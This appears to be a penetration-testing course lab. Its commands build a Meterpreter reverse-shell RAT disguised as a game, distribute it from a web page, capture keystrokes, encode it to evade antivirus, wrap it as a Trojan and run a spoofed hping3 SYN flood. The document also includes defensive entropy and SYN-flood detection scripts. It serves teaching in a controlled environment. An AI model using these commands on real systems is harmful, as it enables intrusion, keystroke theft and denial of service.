Metasploit
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. The Metasploit framework available in Kali Linux is penetration testing software for offensive security teams.
Msfvenom
Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
RAT
Our malware carries a reverse shell payload. When malware is wrapped inside another useful program, such as a game, we have created a Remote Access Trojan, or RAT. Our malware allows the hacker to gain remote access to the victim's computer.
This lab follows these steps:
Step 1: Create the malware using msfvenom
In this step, you create an executable file containing the malicious payload.
Step 2: Distribute the malware using a website
In this step, you upload your malware file to a web server where unsuspecting victims can download it.
Step 3: Start a handler that listens for incoming connections
In this step, you sit and wait until victims click the malicious links on your website.
Step 4: Hack away…
In this step, you can do whatever you want.
In this activity, you will create and distribute malware in a controlled environment.
Expert Mode
Download the games.rar file and extract its content
Start the Apache web server on Kali
Copy the games website into the web server's /html folder
Test the server and the games site
Create a reverse TCP payload using msfvenom
Upload the payload output file (malware) to the website
Create a listener using metasploit
Download and run the malware from your target machine
Download the games.rar file and extract its content
In Kali, start the Apache web server using the following command:
sudo apache2ctl start
An alternative command to run the Apache server if you're using Kali 2024:
sudo service apache2 start
Navigate to the /var/www/html folder and open it as root
Copy the newly extracted games folder into the /var/www/html folder in Kali
Once copied, right-click the games folder, go to Properties, and set the permissions for the Others group to Read and Write
Do the same for the index.html file inside the games folder
Test the website from your Windows machine by entering the IP address of your Kali machine in Internet Explorer. Example: http://192.168.182.128
Navigate to the games folder by typing /games after the IP address in the browser to test the Games Hub webpage. Example: http://192.168.182.128/games
The Malware
Using msfvenom, create the payload and save it in a file called angry_birds.exe by typing the following command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=<Kali's IP Address> lport=443 -f exe -o angry_birds.exe
It goes without saying that you should use your Kali's IP address without the <>.
The above is a general payload; if you want to target a 64-bit architecture, use the command below:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali's IP Address> lport=443 -f exe -o angry_birds.exe -a x64
Msfvenom Code Explanation
-p: use this payload (value is the reverse TCP payload)
lhost=: the IP address of the hacker's machine
lport=: the port number on the hacker's machine
-f: format of the output malware file (value is exe for a Windows executable)
-o: the actual output file, i.e. the malware file itself (value is a name of your choice with the extension you selected, e.g. myvirus.exe)
-a: the architecture (x64 = 64-bit)
The output file (angry_birds.exe) will be in your Kali home folder. Copy it into the games web folder.
The Listener/Handler
We will use the Metasploit framework to create a handler that will listen for incoming connections from infected computers. Start Metasploit and follow the steps shown below:
msfconsole
msf6 > use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
If you used the 64-bit architecture in msfvenom, use the payload below instead:
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.182.128
set lport 443
run
The result of the steps above is a running reverse TCP handler. Confirm that it started and is listening on port 443 of your Kali machine.
Go to Internet Explorer on your Windows machine, refresh, and click the Angry Birds link
Click the Run option and confirm despite the warning. Windows Defender will most likely block this file. To prevent Defender from blocking the malware:
Open Windows Defender
Click Settings
Turn off Real-Time Protection
Go back to your Metasploit listener and notice the new Meterpreter session
Meterpreter: General
Use the help command in meterpreter to learn about the options available to you. Here are some useful ones:
screenshot: take a screenshot of your hacked target
screenshare: open a live view of your hacked target
sysinfo: get information about the remote system, such as the OS
shell: open a system command shell on the hacked target and run any Windows command you want
Meterpreter: Keylogger
A keylogger records the keystrokes on the victim's machine. Run the following commands:
ps: list the running processes on the target and note down the process ID (PID) of explorer.exe
migrate 1884: migrate to the explorer process (note: use the PID you discovered, not the one in the example)
getpid: ensure the migration is done
keyscan_start: start a keylogger on the hacked target
Go to your Windows machine and do something that requires typing (e.g. type in a text document)
Go back to Kali and retrieve the keystrokes using the following command:
keyscan_dump
Malware Analysis
Malware analysis is the study of the functionality, origin and potential impact of a given piece of malware. In other words, it is an investigation of the risks, intentions, and functionality of malware. There are two main types, categorized by analysis method:
Static Analysis
Dynamic Analysis
One way to evade detection by AV software is to encode the malware. Msfvenom has built-in encoding capabilities with many encoders readily available.
In this activity, you will encode the malware in an attempt to evade detection. You will also perform static malware analysis to determine which version evades the most AV engines.
Expert Mode
Create another version of the malware (angry_birds_v2.exe ) but this time encode it with the x86/shikata_ga_nai encoder
Create different encoded versions, each with a different number of encoding iterations
Create different encoded versions, each with a different encoder
Use the following command to list the available encoders:
msfvenom -l encoders
Create a new malware file called angry_birds_v2.exe as we did in Task 1, but this time using an encoder:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.182.128 lport=443 -e x86/shikata_ga_nai -f exe -o angry_birds_v2.exe
We used the -e option (encoder) followed by the name of the encoder: x86/shikata_ga_nai. Notice that only one encoding iteration was performed.
Let's create version 3 (angry_birds_v3.exe) using 20 iterations:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.182.128 lport=443 -e x86/shikata_ga_nai -i 20 -f exe -o angry_birds_v3.exe
We used the -i option (number of iterations).
Repeat the above to create angry_birds_v4.exe using the cmd/powershell_base64 encoder
Repeat the above to create angry_birds_v5.exe using the cmd/powershell_base64 encoder with 10 iterations
You should now have 5 malware files in your Kali folder.
Malware Analysis
Visit the VirusTotal website and upload the first version of your RAT (angry_birds.exe)
Note down how many AV engines detected the malware
Repeat for all versions and note down your findings (you will need the numbers in the questions section)
Let us search for malware by hash signature. On the VirusTotal website, go to Search and look up the following signatures:
Signature 1: e3ec6eac76a6b6692a56e2eac4106d1309a4aa2d0aca52823b6ddb8d4f4428d9
Signature 2: c2cf2118550a0fd7f81fe9913fe36be24c03a0ae5430b94557e0ee71c550a58c
Signature 3: 0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559f
For each signature, write down the malware name and/or type and how many AV engines flagged it (you will need this information to answer some questions later)
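The two checks a defender runs before touching VirusTotal are the file's SHA-256 (the value you paste into the hash search above) and its byte entropy, which climbs towards 8 bits per byte as encoders such as shikata_ga_nai rewrite the payload. The following script is an added example, not part of the lab or of Metasploit; it operates on constructed stand-in byte strings rather than the real angry_birds files, so it runs offline.

```python
import hashlib
import math
from collections import Counter

def sha256_hex(data):
    """SHA-256 of the file contents: the signature you search for on VirusTotal."""
    return hashlib.sha256(data).hexdigest()

def shannon_entropy(data):
    """Bits of entropy per byte (0.0 to 8.0). Encoded or packed payloads sit near 8."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def is_pe(data):
    """Minimal PE check: 'MZ' DOS header and 'PE\\0\\0' at the e_lfanew offset (0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def analyze(name, data, high_entropy=7.0):
    """One static-analysis record per file; the 7.0 threshold is an assumption."""
    ent = shannon_entropy(data)
    return {
        "name": name,
        "sha256": sha256_hex(data),
        "pe": is_pe(data),
        "entropy": round(ent, 3),
        "verdict": "likely encoded/packed" if ent >= high_entropy else "plain",
    }

def constructed_samples():
    """Constructed stand-ins (not real malware): a tiny fake PE header padded with
    NULs, and the same header followed by 2 KB of uniformly distributed bytes."""
    header = bytearray(0x44)
    header[:2] = b"MZ"
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")
    header[0x40:0x44] = b"PE\x00\x00"
    plain = bytes(header) + b"\x00" * 2048
    encoded = bytes(header) + bytes(range(256)) * 8
    return {"plain_v1.exe": plain, "encoded_v3.exe": encoded}

def report():
    """Analyze every constructed sample; swap in open(path, 'rb').read() for real files."""
    return [analyze(n, d) for n, d in constructed_samples().items()]
```

Comparing the entropy column across angry_birds.exe through angry_birds_v5.exe shows why the encoded versions still get flagged: the encoder hides the payload's bytes but leaves an obvious high-entropy blob, which is itself a static-analysis signal.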
If we wrap our malware inside another usable piece of software, such as a game, we have a Trojan. Since our malware allows us to connect remotely to the target machine, it can be classified as a RAT. Msfvenom has two options that allow us to do this:
-x
Specify a custom executable file to use as a template
-k
Preserve the --template behavior and inject the payload as a new thread
In this activity, you will convert our malware into a Trojan.
Expert Mode
Your mission, should you choose to accept it, is to convert our malware into a Trojan
In order to complete this task, you will need a useful program (e.g., a game). The games web folder has two games you can use: Mine Sweeper and Dark Snakes. Choose one for this task
Using the sample commands above as a reference, convert our malware into a Trojan. You will need the -x and -k options
hping3 is a network tool able to send custom TCP/IP packets and to display the target's replies, much as the ping program does with ICMP replies. hping3 can be used to flood port 80 (the HTTP service port) on the target by sending a very large number of packets.
In this activity, you will perform a DoS attack and render a service unavailable on the target.
Expert Mode
Using hping3, perform a DoS attack on the HTTP service running on the Windows 10 target
Get the IP address of the target using nmap:
nmap -sn <Your Network IP>
Find out what services are running on the target:
nmap <Target IP>
Open the web browser in Kali and type in the IP address of your target. You should be able to see a website (see below)
Using hping3, perform a DoS attack on the Windows 10 web server:
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source <Windows 10 IP address>
hping3 is in flood mode, so no replies will be shown.
hping3 Code Explanation
-c 10000: specify the number of packets to send
-d 120: size of each packet
-S: send SYN packets only
-w 64: TCP window size
-p 80: target port 80 (HTTP)
--flood: flood mode (send as fast as possible)
--rand-source: use a random (spoofed) source address for each packet
IP address: target IP address (Windows 10)
While hping3 is running, go back to the web browser and click a few of the links on it (give it a few seconds for the flood to kick in). The server will be too busy and the web pages will take too long to respond.
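From the target's side, the flood above has a recognisable shape: a burst of SYN-only segments to port 80 from many different source addresses within the same second, none of which ever completes a handshake. The detector below is an added example, not part of the lab or of hping3; it parses tcpdump-style summary lines and flags any (second, destination, port) window that matches that shape. The capture lines, the target address 192.168.182.130 and the thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict

# Matches tcpdump-style summaries such as
# "12:00:01.000003 IP 10.3.21.40.1027 > 192.168.182.130.80: Flags [S], seq 0, ..."
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2})\.\d+ IP (?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

def parse_line(line):
    """Return the fields of one summary line, or None if it is not TCP."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pkt = m.groupdict()
    pkt["dport"] = int(pkt["dport"])
    return pkt

def detect_syn_flood(lines, syn_threshold=50, min_sources=20):
    """Count SYN-only segments per (second, dst, dport) and the distinct sources
    behind them. A window with many SYNs from many sources is the --rand-source
    signature; a legitimate burst from one busy client would fail min_sources."""
    syns = defaultdict(int)
    sources = defaultdict(set)
    for line in lines:
        pkt = parse_line(line)
        if pkt is None or pkt["flags"] != "S":      # "S." is a SYN-ACK, "." an ACK
            continue
        key = (pkt["ts"], pkt["dst"], pkt["dport"])
        syns[key] += 1
        sources[key].add(pkt["src"])
    alerts = []
    for key, n in sorted(syns.items()):
        if n >= syn_threshold and len(sources[key]) >= min_sources:
            alerts.append({"second": key[0], "target": f"{key[1]}:{key[2]}",
                           "syns": n, "sources": len(sources[key])})
    return alerts

def sample_capture():
    """Constructed capture: one normal handshake at 12:00:00, then 60 spoofed
    SYNs in the second 12:00:01 (hping3 -S -d 120 -w 64 -p 80 --rand-source)."""
    lines = [
        "12:00:00.100000 IP 192.168.182.128.51000 > 192.168.182.130.80: Flags [S], seq 1, win 64240, length 0",
        "12:00:00.100500 IP 192.168.182.130.80 > 192.168.182.128.51000: Flags [S.], seq 2, ack 2, win 65535, length 0",
        "12:00:00.101000 IP 192.168.182.128.51000 > 192.168.182.130.80: Flags [.], ack 3, win 64240, length 0",
    ]
    for i in range(60):   # unique second octet per packet gives 60 distinct spoofed sources
        lines.append(f"12:00:01.{i:06d} IP 10.{i}.{(i * 7) % 250}.{(i * 13) % 250 + 1}.{1024 + i} "
                     f"> 192.168.182.130.80: Flags [S], seq 0, win 64, length 120")
    return lines
```

On a real host, feed it the output of tcpdump -nn -ttt-style summaries or any equivalent flow export; the thresholds should be tuned to the server's normal connection rate.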